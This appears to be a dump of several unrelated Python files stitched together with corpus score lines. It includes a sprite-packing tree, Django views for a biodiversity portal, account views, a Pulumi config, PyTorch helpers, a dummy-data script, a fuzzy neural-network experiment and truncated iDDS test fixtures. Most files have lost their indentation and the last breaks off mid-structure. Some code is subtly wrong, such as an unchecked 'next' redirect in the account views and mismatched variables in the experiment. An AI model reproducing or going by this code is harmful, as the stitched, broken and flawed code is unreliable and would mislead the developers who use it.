def __init__(self, x=0, y=0, width=0, height=0, used=False,
down=None, right=None):
"""Node constructor.
:param x: X coordinate.
:param y: Y coordinate.
:param width: Image width.
:param height: Image height.
:param used: Flag to determine if the node is used.
:param down: Down :class:`~Node`.
        :param right: Right :class:`~Node`.
"""
self.x = x
self.y = y
self.width = width
self.height = height
self.used = used
self.right = right
self.down = down
def find(self, node, width, height):
"""Find a node to allocate this image size (width, height).
:param node: Node to search in.
        :param width: Width of the image to allocate.
        :param height: Height of the image to allocate.
"""
if node.used:
return self.find(node.right, width, height) or self.find(node.down, width, height)
elif node.width >= width and node.height >= height:
return node
return None
def grow(self, width, height):
""" Grow the canvas to the most appropriate direction.
:param width: Pixels to grow down (width).
:param height: Pixels to grow down (height).
"""
can_grow_d = width <= self.width
can_grow_r = height <= self.height
should_grow_r = can_grow_r and self.height >= (self.width + width)
should_grow_d = can_grow_d and self.width >= (self.height + height)
if should_grow_r:
return self.grow_right(width, height)
elif should_grow_d:
return self.grow_down(width, height)
elif can_grow_r:
return self.grow_right(width, height)
elif can_grow_d:
return self.grow_down(width, height)
return None
def grow_right(self, width, height):
"""Grow the canvas to the right.
        :param width: Pixels to grow right (width).
:param height: Pixels to grow down (height).
"""
old_self = copy.copy(self)
self.used = True
self.x = self.y = 0
self.width += width
self.down = old_self
self.right = SquareAlgorithmNode(x=old_self.width,
y=0,
width=width,
height=self.height)
node = self.find(self, width, height)
if node:
return self.split(node, width, height)
return None
def grow_down(self, width, height):
"""Grow the canvas down.
:param width: Pixels to grow down (width).
:param height: Pixels to grow down (height).
"""
old_self = copy.copy(self)
self.used = True
self.x = self.y = 0
self.height += height
self.right = old_self
self.down = SquareAlgorithmNode(x=0,
y=old_self.height,
width=self.width,
height=height)
node = self.find(self, width, height)
if node:
return self.split(node, width, height)
return None
def split(self, node, width, height):
"""Split the node to allocate a new one of this size.
        :param node: Node to be split.
:param width: New node width.
:param height: New node height.
"""
node.used = True
node.down = SquareAlgorithmNode(x=node.x,
y=node.y + height,
width=node.width,
height=node.height - height)
node.right = SquareAlgorithmNode(x=node.x + width,
y=node.y,
width=node.width - width,
height=height)
return node
class SquareAlgorithm(object):
def process(self, sprite):
root = SquareAlgorithmNode(width=sprite.images[0].absolute_width,
height=sprite.images[0].absolute_height)
        # Loop over all the images, creating a binary tree
for image in sprite.images:
node = root.find(root, image.absolute_width, image.absolute_height)
if node: # Use this node
node = root.split(node, image.absolute_width, image.absolute_height)
else: # Grow the canvas
node = root.grow(image.absolute_width, image.absolute_height)
image.x = node.x
image.y = node.y
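if __name__ == '__main__':
    # Minimal usage sketch (not part of the original glue source). The classes below are
    # hypothetical stand-ins exposing only the attributes this algorithm reads and writes
    # (absolute_width, absolute_height, x, y); glue's real sprite/image objects carry more state.
    class _FakeImage(object):
        def __init__(self, width, height):
            self.absolute_width = width
            self.absolute_height = height
            self.x = None
            self.y = None
    class _FakeSprite(object):
        def __init__(self, images):
            self.images = images
    sprite = _FakeSprite([_FakeImage(64, 64), _FakeImage(32, 64), _FakeImage(32, 32)])
    SquareAlgorithm().process(sprite)
    for image in sprite.images:
        # each image now carries the (x, y) offset assigned by the packer
        print(image.absolute_width, image.absolute_height, image.x, image.y)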
| 3.515625 | 4 |
apps/page/views.py | v02202/portal20 | 0 | 12786833 | import re
import csv
import codecs
import json
import os
import environ
from django.shortcuts import render, get_object_or_404
from django.http import (
HttpResponse,
HttpResponseNotFound,
)
from django.db.models import (
Q,
F,
Count,
Sum
)
from django.conf import settings
from apps.data.models import (
Dataset,
Taxon,
SimpleData,
)
from apps.article.models import Article
from .models import Post, Journal
from utils.mail import taibif_mail_contact_us
from apps.data.helpers.stats import get_home_stats
from django.utils.translation import ugettext as _
from django.views.decorators.http import require_GET
def index(request):
news_list = Article.objects.filter(category='NEWS').all()[0:4]
event_list = Article.objects.filter(category='EVENT').all()[0:4]
update_list = Article.objects.filter(category='UPDATE').all()[0:4]
#topic_list = Article.objects.filter(category__in=['SCI', 'TECH', 'PUB']).order_by('?').all()[0:10]
topic_list = Article.objects.filter(is_homepage=True).order_by('?').all()[0:10]
context = {
'news_list': news_list,
'event_list': event_list,
'update_list': update_list,
'topic_list': topic_list,
'stats': get_home_stats(),
}
return render(request, 'index.html', context)
def publishing_data(request):
return render(request, 'publishing-data.html')
def journals(request):
Journal_url = Journal.objects.all()
return render(None,'journals.html', locals())
def cookbook(request):
return render(request, 'cookbook.html')
def cookbook_detail_1(request):
return render(request, 'cookbook-detail-1.html')
def cookbook_detail_2(request):
return render(request, 'cookbook-detail-2.html')
def cookbook_detail_3(request):
return render(request, 'cookbook-detail-3.html')
def tools(request):
return render(request, 'tools.html')
def contact_us(request):
if request.method == 'GET':
return render(request, 'contact-us.html')
elif request.method == 'POST':
data = {
'name': request.POST.get('name', ''),
'cat': request.POST.get('cat', ''),
'email': request.POST.get('email', ''),
'content': request.POST.get('content', ''),
}
context = taibif_mail_contact_us(data)
#context = taibif_send_mail(subject, content, settings.SERVICE_EMAIL, to_list)
return render(request, 'contact-us.html', context)
def plans(request):
return render(request, 'plans.html')
def links(request):
Post_url = Post.objects.all()
return render(None,'links.html', locals())
def about_taibif(request):
return render(request, 'about-taibif.html')
def about_gbif(request):
return render(request, 'about-gbif.html')
def open_data(request):
return render(request, 'open-data.html')
def data_stats(request):
is_most = request.GET.get('most', '')
query = Dataset.objects #.exclude(status='Private')
if is_most:
query = query.filter(is_most_project=True)
context = {
'dataset_list': query.order_by(F('pub_date').desc(nulls_last=True)).all(),
'env': settings.ENV
}
return render(request, 'data-stats.html', context)
def common_name_checker(request):
global results
if request.method == 'GET':
q = request.GET.get('q', '')
sep = request.GET.get('sep', '')
context = {
'q': q,
'sep': sep,
}
return render(request, 'tools-common_name_checker.html', context)
elif request.method == 'POST':
q = request.POST.get('q', '')
sep = request.POST.get('sep', 'n')
if not q:
context = {
'message': {
'head': '輸入錯誤',
'content': '請輸入中文名',
}
}
return render(request, 'tools-common_name_checker.html', context)
if q in ['台灣', '臺灣']:
context = {
'message': {
'head': '結果太多',
'content': '請輸入更完整中文名',
},
'sep': sep,
'q': q,
}
return render(request, 'tools-common_name_checker.html', context)
if not sep:
sep = 'n'
results = []
if sep not in [',', 'n']:
return HttpResponseNotFound('err input')
sep_real = '\n' if sep == 'n' else sep
cname_list = q.split(sep_real)
cname_list = list(set(cname_list))
#taiwan_char_check_exclude = ['台灣留鳥', '台灣過境', '台灣亞種', '台灣特有亞種']
for cn in cname_list:
cn = cn.strip()
q_replace = ''
if '台灣' in cn:
q_replace = cn.replace('台灣', '臺灣')
if '臺灣' in cn:
q_replace = cn.replace('臺灣', '台灣')
row = {
'common_name': cn,
'match_type': 'no match',
'match_list': []
}
taxa = Taxon.objects.filter(rank='species')
if q_replace:
row['q_replace'] = q_replace
taxa = Taxon.objects.filter(Q(name_zh__icontains=cn) | Q(name_zh__icontains=q_replace)).all()
else:
taxa = Taxon.objects.filter(name_zh__icontains=cn).all()
if taxa:
row['match_type'] = 'match'
for t in taxa:
row['match_list'].append(t)
results.append(row)
context = {
'results': results,
'q': q,
'sep': sep,
}
return render(request, 'tools-common_name_checker.html', context)
def export_csv(request):
response = HttpResponse(content_type='text/csv')
response['Content-Disposition'] = 'attachment; filename="users.csv"'
response.write(codecs.BOM_UTF8)
writer = csv.writer(response)
for row in results:
writer.writerow(row['match_list'])
return response
def trans(request):
translate_str = _("這裡放需要翻譯的文字")
context = {"translate_str": translate_str}
return render(request, 'index.html', context)
@require_GET
def robots_txt(request):
if os.environ.get('ENV')=='prod':
lines = [
"User-Agent: *",
"Disallow: /admin/",
]
return HttpResponse("\n".join(lines), content_type="text/plain")
else:
lines = [
"User-Agent: *",
"Disallow: /",
]
return HttpResponse("\n".join(lines), content_type="text/plain")
## Kuan-Yu added for API occurrence record
def test(request):
Yearquery = SimpleData.objects \
.filter(scientific_name='Rana latouchii') \
.values('scientific_name', 'vernacular_name', 'year') \
.exclude(year__isnull=True) \
.annotate(count=Count('year')) \
.order_by('-count')
year_rows = [{
'key': x['scientific_name'],
'label': x['vernacular_name'],
'year': x['year'],
'count': x['count']
} for x in Yearquery]
context = {
'occurrence_list': year_rows,
}
return render(request, 'test.html', context)
###example
filt1 = 'speices'
filt2 = 'database'
pk1 = '<NAME>'
pk2 = 'manager_17_15'
pk3 = '<NAME>'
pk4 = 'e10100001_4_10'
def ChartYear(request):
if filt1 == 'hi':
species = SimpleData.objects.filter(Q(scientific_name=pk1) | Q(scientific_name=pk3))
sp_year = species.values('year') \
.exclude(year__isnull=True) \
.annotate(count=Count('year')) \
.order_by('-year')
chart_year = [
{
"page": 1,
"pages": 1,
"per_page": "50",
"total": 1
},
[
{
'year': x['year'],
'count': x['count']
} for x in sp_year
]
]
if filt2 == 'you':
dataset = SimpleData.objects.filter(Q(taibif_dataset_name=pk2) | Q(taibif_dataset_name=pk4))
data_year = dataset.values( 'year') \
.exclude(year__isnull=True) \
.annotate(count=Count('year')) \
.order_by('-year')
chart_year = [
{
"page": 1,
"pages": 1,
"per_page": "50",
"total": 1
},
[
{
'year': x['year'],
'count': x['count']
} for x in data_year
]
]
if (filt2 == filt2 and filt1 == filt1):
data_sp = SimpleData.objects.filter(Q(scientific_name=pk1) | Q(scientific_name=pk3)) \
.filter(Q(taibif_dataset_name=pk2) | Q(taibif_dataset_name=pk4))
data_sp_month = data_sp.values('year') \
.exclude(year__isnull=True) \
.annotate(count=Count('year')) \
.order_by('-year')
chart_year = [
{
"page": 1,
"pages": 1,
"per_page": "50",
"total": 1
},
[
{
'year': x['year'],
'count': x['count']
} for x in data_sp_month
]
]
return HttpResponse(json.dumps(chart_year), content_type="application/json")
def ChartMonth(request):
if filt1 == 'hi':
species = SimpleData.objects.filter(Q(scientific_name=pk1) | Q(scientific_name=pk3))
sp_month = species.values( 'month') \
.exclude(month__isnull=True) \
.annotate(count=Count('month')) \
.order_by('-month')
chart_month = [
{
"page": 1,
"pages": 1,
"per_page": "50",
"total": 1
},
[
{
'month': x['month'],
'count': x['count']
} for x in sp_month
]
]
if filt2 == 'you':
dataset = SimpleData.objects.filter(Q(taibif_dataset_name=pk2) | Q(taibif_dataset_name=pk4))
data_month = dataset.values('month') \
.exclude(month__isnull=True) \
.annotate(count=Count('month')) \
.order_by('-month')
chart_month = [
{
"page": 1,
"pages": 1,
"per_page": "50",
"total": 1
},
[
{
'month': x['month'],
'count': x['count']
} for x in data_month
]
]
if (filt2 == filt2 and filt1 == filt1):
data_sp = SimpleData.objects.filter(Q(scientific_name=pk1) | Q(scientific_name=pk3)) \
.filter(Q(taibif_dataset_name=pk2) | Q(taibif_dataset_name=pk4))
data_sp_month = data_sp.values('month') \
.exclude(month__isnull=True) \
.annotate(count=Count('month')) \
.order_by('-month')
chart_month = [
{
"page": 1,
"pages": 1,
"per_page": "50",
"total": 1
},
[
{
'month': x['month'],
'count': x['count']
} for x in data_sp_month
]
]
return HttpResponse(json.dumps(chart_month), content_type="application/json")
| 1.890625 | 2 |
bundestagger/account/views.py | stefanw/Bundestagger | 3 | 12786834 | # -*- coding: utf-8 -*-
from django.http import Http404, HttpResponseBadRequest, HttpResponseForbidden, HttpResponseNotAllowed
from django.shortcuts import redirect
from django.contrib import messages
from bundestagger.helper.utils import is_post
from bundestagger.account.auth import logged_in
from bundestagger.account.models import User
@is_post
def logout(request):
from bundestagger.account.auth import logout as logout_func
logout_func(request)
next = "/"
if "next" in request.POST:
next = request.POST["next"]
return redirect(next)
@is_post
@logged_in
def change_username(request):
if "username" in request.POST:
user = request.bundesuser
username = request.POST["username"]
if username != user.username:
if len(username)>20:
messages.add_message(request, messages.INFO, u"Username ist zu lang")
elif len(username)==0:
messages.add_message(request, messages.INFO, u"Username ist zu kurz")
else:
uc = User.objects.filter(username=username).count()
if uc == 0:
user.username = request.POST["username"]
user.save()
request.session["bundesuser"] = user
messages.add_message(request, messages.INFO, u"Username geändert")
else:
messages.add_message(request, messages.INFO, u"Username ist schon vergeben")
next = "/"
if "next" in request.POST:
next = request.POST["next"]
return redirect(next) | 1.976563 | 2 |
sdk/python/pulumi_linode/config/vars.py | displague/pulumi-linode | 1 | 12786835 | <reponame>displague/pulumi-linode
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import json
import warnings
import pulumi
import pulumi.runtime
from .. import utilities, tables
__config__ = pulumi.Config('linode')
token = utilities.require_with_default(lambda: __config__.require('token'), utilities.get_env('LINODE_TOKEN', 'LINODE_API_TOKEN'))
"""
The token that allows you access to your Linode account
"""
ua_prefix = __config__.get('uaPrefix')
"""
An HTTP User-Agent Prefix to prepend in API requests.
"""
url = __config__.get('url')
"""
The HTTP(S) API address of the Linode API to use.
"""
| 0.933594 | 1 |
audlib/nn/util.py | RaphaelOlivier/pyaudlib | 26 | 12786836 | """Utility functions for neural networks."""
import numpy as np
import torch
def detach(states):
"""Truncate backpropagation (usually used in RNN)."""
return [state.detach() for state in states]
def hasnan(m):
"""Check if torch.tensor m have NaNs in it."""
return np.any(np.isnan(m.cpu().data.numpy()))
def printnn(model):
"""Print out neural network."""
for name, param in model.named_parameters():
if param.requires_grad:
print("{}[{}]\n{}".format('-' * 30, name, param.data.numpy()))
def numparams(model):
"""Calculate the total number of learnable parameters."""
return sum(p.numel() for p in model.parameters())
class UnpackedSequence(object):
"""Unpack a PackedSequence to original (unpadded) examples."""
def __init__(self, ps):
"""Construct an unpacked sequence object."""
self.packed_sequence = ps
lencnt = [int(n) for n in ps.batch_sizes[:-1]-ps.batch_sizes[1:]] \
+ [int(ps.batch_sizes[-1])]
self.seqlengths = [] # seqlengths[i] contains length of example i
for num, ll in zip(lencnt[::-1], range(len(lencnt), 0, -1)):
self.seqlengths.extend([ll] * num)
assert len(self.seqlengths) == self.packed_sequence.batch_sizes[0]
def __len__(self):
"""Return number of examples in this batch."""
return len(self.seqlengths)
def __getitem__(self, i):
"""Get original idx-th item in the batch."""
idx = torch.LongTensor(self.seqlengths[i])
idx[0] = i
idx[1:] = self.packed_sequence.batch_sizes[:self.seqlengths[i]-1]
ei = self.packed_sequence.data[idx.cumsum(0)] # example i
return ei
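if __name__ == "__main__":
    # Minimal usage sketch (not part of the original module): pack a few variable-length
    # sequences with torch and recover each original tensor through UnpackedSequence.
    from torch.nn.utils.rnn import pack_sequence
    seqs = [torch.randn(5, 3), torch.randn(3, 3), torch.randn(2, 3)]
    packed = pack_sequence(seqs)  # inputs already sorted by decreasing length
    unpacked = UnpackedSequence(packed)
    assert len(unpacked) == len(seqs)
    for original, recovered in zip(seqs, unpacked):
        assert torch.equal(original, recovered)
    print("Recovered", len(unpacked), "sequences from the packed batch.")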
| 3.25 | 3 |
application/KitchenMagician/kitchen_magician/users/db/dummy_data.py | AsuPaul19/Kitchen-Magician | 0 | 12786837 | <reponame>AsuPaul19/Kitchen-Magician
from django.contrib.auth.models import User
from users.models import Profile
from groups.models import Group
from groups.models import GroupUser
import random
class DummyData():
def __init__(self, user_num=1):
self.user_num = user_num
self.users = self.create_dummy_users()
def create_dummy_users(self):
users = []
for i in range(self.user_num):
username = f"User{i}"
password = <PASSWORD>
email = f"{<EMAIL>"
user = User.objects.filter(username=username).first()
# create user if not exist
if not user:
# create a user
user = User.objects.create_user(username=username, password=password, email=email)
user.save()
# create the profile
default_images_folder = 'default_images/avatars/'
image_name = f"avatar-flat-{random.randint(1, 50)}.png"
user_profile = Profile.objects.create(user=user, image=default_images_folder+image_name)
print(user_profile.image)
user_profile.save()
print(f"User - {user}")
users.append(user)
return users
def create_dummy_groupuser(self):
groups = list(Group.objects.all())
l_groups = len(groups)
for user in self.users:
# random groups sample
groups_sample = random.sample(groups, l_groups//2)
for group in groups_sample:
                # If the user hasn't joined the group yet, add the membership to the table
if not GroupUser.objects.filter(user=user, group=group).first():
group_user = GroupUser(user=user, group=group)
group_user.save()
print(f"GroupUser - {group_user}")
| 2.84375 | 3 |
slingen/src/algogen/core/algebraic_manipulation.py | danielesgit/slingen | 23 | 12786838 | <filename>slingen/src/algogen/core/algebraic_manipulation.py
from core.expression import Symbol, Matrix, Vector, \
Equal, Plus, Minus, Times, Transpose, Inverse, \
BlockedExpression, Sequence, Predicate, \
PatternDot
from core.properties import *
from core.InferenceOfProperties import *
from core.builtin_operands import Zero, Identity
from core.functional import replace_all
from core.rules_collection import simplify_rules, canonicalIO_rules
from core.rules_collection_base import canonical_rules
def to_canonical( expr ):
return replace_all( expr, canonical_rules )
def to_canonicalIO( expr ):
return replace_all( expr, canonical_rules+canonicalIO_rules )
def simplify( expr ):
return replace_all( expr, simplify_rules )
| 1.75 | 2 |
6_google_trace/VMFuzzyPrediction/experiments/ExperimentFuzzyBPNNM.py | nguyenthieu95/machine_learning | 1 | 12786839 | <filename>6_google_trace/VMFuzzyPrediction/experiments/ExperimentFuzzyBPNNM.py
from io_utils.NumLoad import *
from sklearn.cross_validation import train_test_split
from estimators.FuzzyFlow import FuzzyFlow
from utils.TrainingTestMaker import TrainingTestMaker
from scaling.ProactiveSLA import ProactiveSLA
from __init__fuzzy import *
dataset_holder = []
trainee_holder = {}
metrics = ["cpu_rate","mem_usage","disk_io_time"]
arr_desk = ['X_train','y_train','X_test']
sliding_number = 3
data = pd.read_csv('sampling_617685_metric_10min_datetime_origin.csv',parse_dates=True,index_col=0)[:3000]
def experiment(sliding_number):
for metric in metrics:
dat = pd.Series(data[metric].round(5))
fuzzy_engine = FuzzyFlow()
data_maker = TrainingTestMaker()
fuzzy_engine.fit_transform(dat)
sliding = np.array(list(SlidingWindow(fuzzy_engine.u_class_transform, sliding_number)))
X_train, y_train, X_test, y_test = data_maker.make_fuzzy_test(sliding, fuzzy_engine.u_class_transform, dat)
dataset_holder.append(fuzzy_engine)
trainee_holder[metric] = {
'X_train': X_train,
"y_train": y_train,
"X_test": X_test,
"y_test": y_test
}
y_train = np.asarray(zip(*[trainee_holder[metric]['y_train'] for metric in metrics]))
# X_test = zip(trainee_holder['cpu_rate']['X_test'],trainee_holder['mem_usage']['X_test'])
X_train = []
X_test = []
# y_train = []
for i in np.arange(len(trainee_holder['cpu_rate']['X_train'])):
# tmp = zip(trainee_holder['cpu_rate']['X_train'][i],trainee_holder['mem_usage']['X_train'][i])
tmp = zip(*[trainee_holder[metric]['X_train'][i] for metric in metrics])
X_train.append(np.ravel(tmp))
for i in np.arange(len(trainee_holder['cpu_rate']['X_test'])):
tmp = zip(*[trainee_holder[metric]['X_test'][i] for metric in metrics])
X_test.append(np.ravel(tmp))
X_train = np.array(X_train)
X_test = np.array(X_test)
classifier = KerasRegressor(hidden_nodes=[64],steps=10000,batch_size=32, activation='sigmoid',verbose=2, learning_rate=0.001)
a = classifier.fit(X_train, y_train)
y_pred = np.round(abs(classifier.predict(X_test)))
y_cpu = dataset_holder[0].inverse_transform(abs(y_pred[:, 0]))
y_ram = dataset_holder[1].inverse_transform(abs(y_pred[:, 1]))
y_disk_io = dataset_holder[1].inverse_transform(abs(y_pred[:, 2]))
score_mae_CPU = mean_absolute_error(y_cpu, trainee_holder['cpu_rate']['y_test'])
score_mae_RAM = mean_absolute_error(y_ram, trainee_holder['mem_usage']['y_test'])
score_mae_disk_io = mean_absolute_error(y_ram, trainee_holder['disk_io_time']['y_test'])
y_test = zip(trainee_holder['cpu_rate']['y_test'],trainee_holder['mem_usage']['y_test'])
np.savez('model_saved/Fuzzy_BPNNM_%s_%s' % (sliding_number, score_mae_CPU), y_pred=y_pred, y_true=y_test)
return sliding_number, score_mae_CPU, score_mae_RAM, score_mae_disk_io
result = [[experiment(sliding_number=i) for i in np.arange(2,6)] for j in np.arange(2)]
cols = ["sliding_number"]
cols.extend(metrics)
results = pd.DataFrame(np.array(result).reshape(-1,len(cols)), columns=cols)
#results.to_csv('experiment_logs/fgabpnnm_experiment.csv')
results.to_csv('experiment_logs/fuzzy_bpnn_experimentm.csv')
| 2.078125 | 2 |
ziken03/models.py | ihakiwamu/Experiment_Ryakugo | 0 | 12786840 | <filename>ziken03/models.py<gh_stars>0
# coding: UTF-8
import matplotlib.pyplot as plt
from input import read_file, conv_str_to_kana, conv_kana_to_vec, conv_kana_to_vec_meta, conv_vec_to_kana, calc_accuracy
from sklearn import svm
from sklearn.linear_model import LinearRegression
from sklearn.model_selection import train_test_split
from sklearn.metrics import mean_absolute_error
import matplotlib.pyplot as plt
import numpy as np
import csv
import pandas as pd
from sklearn.decomposition import PCA
from sklearn.cluster import KMeans
# Data generation section
List = pd.read_csv('dataset_proto.csv')
data = read_file('dataset_proto.csv')
kana_title, kana_ans = conv_str_to_kana(data[0],data[1])
vec_title = conv_kana_to_vec_meta(kana_title,1,"T")
vec_ans = conv_kana_to_vec_meta(kana_ans,1,"R")
List1 = List.copy()
List1['Title_vec'] = vec_title
List1['Ans_vec'] = vec_ans
pca = PCA(n_components=1)
x_pca = pca.fit_transform(vec_title)
y_pca = pca.fit_transform(vec_ans)
List2 = List1.copy()
List2['X'] = x_pca
List2['Y'] = y_pca
model1 = KMeans(n_clusters=5, random_state=0)
data1_X = List2[['X','Y']]
model1.fit(data1_X)
y1 = model1.labels_
print(y1)
data_results = List2.copy()
data_results['分類結果'] = y1
data_result = data_results.sort_values('分類結果')
# Data classification section
list_title = data_results[['Title_vec']]
list_ans = data_results[['Ans_vec']]
list_title = list_title.values
list_ans = list_ans.values
num = 0
list0_title = []
list1_title = []
list2_title = []
list3_title = []
list4_title = []
list0_ans = []
list1_ans = []
list2_ans = []
list3_ans = []
list4_ans = []
list_ = data_results[['分類結果']].values
for i in list_:
if int(i) == 0:
list0_title.extend(list_title[num])
list0_ans.extend(list_ans[num])
elif int(i) == 1:
list1_title.extend(list_title[num])
list1_ans.extend(list_ans[num])
elif int(i) == 2:
list2_title.extend(list_title[num])
list2_ans.extend(list_ans[num])
elif int(i) == 3:
list3_title.extend(list_title[num])
list3_ans.extend(list_ans[num])
elif int(i) == 4:
list4_title.extend(list_title[num])
list4_ans.extend(list_ans[num])
else:
print("なんか抜けてるよ")
num += 1
# Function for training and prediction
def clustering(trainX,trainY):
X_train, X_test, Y_train, Y_test = train_test_split(vec_title, vec_ans, train_size = 0.8, test_size = 0.2, random_state = 0)
    # Fit with linear regression
lr = LinearRegression()
lr.fit(trainX,trainY)
Y_pred = lr.predict(X_test)
Y_pred = np.array(Y_pred)
Y_test = np.array(Y_test)
    # Compute the differences between predictions and ground truth
pred_diff = []
for j,title in enumerate(Y_pred):
title_diff = []
for k,val in enumerate(title):
diff = abs(val - Y_test[j,k])
title_diff.append(diff)
pred_diff.append(title_diff)
#print(mean_absolute_error(Y_test, Y_pred))
    # Write out to CSV
with open("pred_diff.csv", "w") as file:
writer = csv.writer(file, lineterminator='\n')
writer.writerows(pred_diff)
    # Convert to 0/1
for title in Y_pred:
for index,i in enumerate(title):
if i<=0.2:
title[index] = 0
else:
title[index] = 1
# title[index] = round(j)
    # Convert back to kana and compare
Y_pred = Y_pred.tolist()
Y_test = Y_test.tolist()
Y_pred_kana = conv_vec_to_kana(Y_pred)
Y_test_kana = conv_vec_to_kana(Y_test)
return calc_accuracy(Y_pred_kana,Y_test_kana), Y_pred_kana, Y_test_kana
# Execution section
model_listT = [list0_title, list1_title, list2_title, list3_title, list4_title]
model_listA = [list0_ans, list1_ans, list2_ans, list3_ans, list4_ans]
for i in range(5):
score, Y_pred_kana, Y_test_kana = clustering(model_listT[i], model_listA[i])
print("モデル"+str(i)+"号")
print(str(score)+"点")
"""
for x, y in enumerate(Y_pred_kana):
print(" ".join(Y_test_kana[x]))
print(" ".join(y))
print("\n")
"""
| 2.609375 | 3 |
main/lib/idds/tests/core_tests.py | HSF/iDDS | 0 | 12786841 | <gh_stars>0
import sys
import datetime
from idds.common.utils import json_dumps # noqa F401
from idds.common.constants import ContentStatus, ContentType, ContentRelationType, ContentLocking # noqa F401
from idds.core.requests import get_requests # noqa F401
from idds.core.messages import retrieve_messages # noqa F401
from idds.core.transforms import get_transforms # noqa F401
from idds.core.workprogress import get_workprogresses # noqa F401
from idds.core.processings import get_processings # noqa F401
from idds.core import transforms as core_transforms # noqa F401
from idds.orm.contents import get_input_contents
from idds.core.transforms import release_inputs_by_collection, release_inputs_by_collection_old # noqa F401
def release_inputs_test():
to_release_inputs = {3498: [{'map_id': 1, 'status': ContentStatus.Available, 'retries': 0, 'scope': 'pseudo_dataset',
'substatus': ContentStatus.Available, 'path': None,
'name': 'u_jchiang_dark_12781_panda_20210712T222923Z.qgraph+3_isr_3020111900038_94+qgraphNodeId:3+qgraphId:1626129062.5744567-119392',
'content_id': 2248918, 'min_id': 0, 'bytes': 1, 'coll_id': 3498, 'max_id': 1, 'md5': None,
'request_id': 93, 'content_type': ContentType.File, 'adler32': '12345678',
'workload_id': 1626129080, 'content_relation_type': ContentRelationType.Output,
'processing_id': None, 'content_metadata': {'events': 1, 'panda_id': 1411522}, 'transform_id': 1749, 'storage_id': None},
{'map_id': 2, 'status': ContentStatus.Available, 'retries': 0, 'scope': 'pseudo_dataset',
'substatus': ContentStatus.Available, 'path': None,
'name': 'u_jchiang_dark_12781_panda_20210712T222923Z.qgraph+2_isr_3020111900032_94+qgraphNodeId:2+qgraphId:1626129062.5744567-119392',
'content_id': 2248919, 'min_id': 0, 'bytes': 1, 'coll_id': 3498, 'max_id': 1, 'md5': None,
'request_id': 93, 'content_type': ContentType.File, 'adler32': '12345678',
'workload_id': 1626129080, 'content_relation_type': ContentRelationType.Output,
'processing_id': None, 'content_metadata': {'events': 1, 'panda_id': 1411523}, 'transform_id': 1749, 'storage_id': None},
{'map_id': 3, 'status': ContentStatus.Available, 'retries': 0, 'scope': 'pseudo_dataset',
'substatus': ContentStatus.Available, 'path': None,
'name': 'u_jchiang_dark_12781_panda_20210712T222923Z.qgraph+4_isr_3020111900040_94+qgraphNodeId:4+qgraphId:1626129062.5744567-119392',
'content_id': 2248920, 'min_id': 0, 'bytes': 1, 'coll_id': 3498, 'max_id': 1, 'md5': None,
'request_id': 93, 'content_type': ContentType.File, 'adler32': '12345678',
'workload_id': 1626129080, 'content_relation_type': ContentRelationType.Output,
'processing_id': None, 'content_metadata': {'events': 1, 'panda_id': 1411524}, 'transform_id': 1749, 'storage_id': None},
{'map_id': 4, 'status': ContentStatus.Available, 'retries': 0, 'scope': 'pseudo_dataset',
'substatus': ContentStatus.Available, 'path': None,
'name': 'u_jchiang_dark_12781_panda_20210712T222923Z.qgraph+1_isr_3020111900036_94+qgraphNodeId:1+qgraphId:1626129062.5744567-119392',
'content_id': 2248921, 'min_id': 0, 'bytes': 1, 'coll_id': 3498, 'max_id': 1, 'md5': None,
'request_id': 93, 'content_type': ContentType.File, 'adler32': '12345678',
'workload_id': 1626129080, 'content_relation_type': ContentRelationType.Output,
'processing_id': None, 'content_metadata': {'events': 1, 'panda_id': 1411525}, 'transform_id': 1749, 'storage_id': None},
{'map_id': 5, 'status': ContentStatus.Available, 'retries': 0, 'scope': 'pseudo_dataset',
'substatus': ContentStatus.Available, 'path': None,
'name': 'u_jchiang_dark_12781_panda_20210712T222923Z.qgraph+0_isr_3020111900034_94+qgraphNodeId:0+qgraphId:1626129062.5744567-119392',
'content_id': 2248922, 'min_id': 0, 'bytes': 1, 'coll_id': 3498, 'max_id': 1, 'md5': None,
'request_id': 93, 'content_type': ContentType.File, 'adler32': '12345678',
'workload_id': 1626129080, 'content_relation_type': ContentRelationType.Output,
'processing_id': None, 'content_metadata': {'events': 1, 'panda_id': 1411526}, 'transform_id': 1749, 'storage_id': None}
]}
to_release_inputs = {4042: [{'map_id': 1, 'status': ContentStatus.Available, 'retries': 0, 'scope': 'pseudo_dataset', 'substatus': ContentStatus.Available, 'path': None, 'name': 'u_huanlin_panda_test_ci_imsim_w26_20210714T214732Z.qgraph+13_isr_257768_161+1626299263.3909254-24148+13', 'locking': ContentLocking.Idle, 'created_at': datetime.datetime(2021, 7, 14, 21, 48, 10), 'content_id': 2254913, 'min_id': 0, 'bytes': 1, 'updated_at': datetime.datetime(2021, 7, 14, 22, 8, 30), 'coll_id': 4042, 'max_id': 1, 'md5': None, 'accessed_at': datetime.datetime(2021, 7, 14, 22, 8, 30), 'request_id': 107, 'content_type': ContentType.File, 'adler32': '12345678', 'expired_at': datetime.datetime(2021, 8, 13, 21, 48, 10), 'workload_id': 1626299273, 'content_relation_type': ContentRelationType.Output, 'processing_id': None, 'content_metadata': {'events': 1, 'panda_id': 1412272}, 'transform_id': 2021, 'storage_id': None}, # noqa E501
{'map_id': 2, 'status': ContentStatus.Available, 'retries': 0, 'scope': 'pseudo_dataset', 'substatus': ContentStatus.Available, 'path': None, 'name': 'u_huanlin_panda_test_ci_imsim_w26_20210714T214732Z.qgraph+2_isr_212071_54+1626299263.3909254-24148+2', 'locking': ContentLocking.Idle, 'created_at': datetime.datetime(2021, 7, 14, 21, 48, 10), 'content_id': 2254914, 'min_id': 0, 'bytes': 1, 'updated_at': datetime.datetime(2021, 7, 14, 22, 8, 30), 'coll_id': 4042, 'max_id': 1, 'md5': None, 'accessed_at': datetime.datetime(2021, 7, 14, 22, 8, 30), 'request_id': 107, 'content_type': ContentType.File, 'adler32': '12345678', 'expired_at': datetime.datetime(2021, 8, 13, 21, 48, 10), 'workload_id': 1626299273, 'content_relation_type': ContentRelationType.Output, 'processing_id': None, 'content_metadata': {'events': 1, 'panda_id': 1412273}, 'transform_id': 2021, 'storage_id': None}, # noqa E501
